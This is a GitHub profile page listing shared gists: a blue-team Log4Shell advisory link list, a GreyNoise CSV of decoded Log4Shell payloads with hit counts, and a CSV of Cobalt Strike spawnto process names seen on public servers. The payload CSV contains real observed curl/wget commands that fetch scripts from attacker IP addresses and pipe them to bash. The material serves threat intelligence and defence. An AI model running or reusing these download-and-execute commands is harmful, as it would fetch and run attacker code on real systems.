Skip to content

Instantly share code, notes, and snippets.

View MichaelKoczwara's full-sized avatar
🌴
On vacation

MichaelKoczwara

🌴
On vacation
138 followers · 20 following
View GitHub Profile
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active July 22, 2024 18:44
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
@MHaggis
MHaggis / Beacon.csv
Created December 23, 2020 14:12
Extraction of Spawnto's in public CobaltStrike servers, related to https://twitter.com/M_haggis/status/1341746928665542659?s=20, https://twitter.com/MichalKoczwara/status/1341659356866240517
spawnto count
WUAUCLT.exe 1
WerFault.exe 3
batchexe 2
cmstp.exe 1
compact.exe 1
dllhost.exe 3
eventvwr.exe 1
gpresult.exe 2
gpupdate.exe 16